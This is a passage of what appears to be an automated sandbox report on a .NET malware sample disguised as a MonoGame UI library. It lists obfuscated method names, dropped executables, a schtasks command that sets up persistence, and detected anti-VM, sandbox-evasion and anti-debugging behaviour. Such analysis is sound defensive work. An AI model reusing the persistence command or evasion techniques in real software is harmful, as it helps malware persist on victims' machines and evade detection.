Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeJump to dropped file
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile created: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00403BC7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00403BC7
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3Show sources
Source: Yara matchFile source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Cassandra CrypterShow sources
Source: Yara matchFile source: 00000004.00000002.1973693827.0000000002FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1973804512.0000000003035000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1979138180.0000000006090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara matchFile source: 4.2.qaxCr0UKyI0yfkE.exe.6090000.5.raw.unpack, type: UNPACKEDPE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeThread delayed: delay time: 922337203685477Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 3444Thread sleep time: -53726s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2172Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2564Thread sleep count: 182 > 30Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2564Thread sleep time: -182000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 4400Thread sleep count: 166 > 30Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 4400Thread sleep time: -166000s >= -30000sJump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW,8_2_0040A1A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,12_2_0040702D
Contains functionality to query system informationShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418A6B memset,GetSystemInfo,8_2_00418A6B
Queries a list of all running processesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
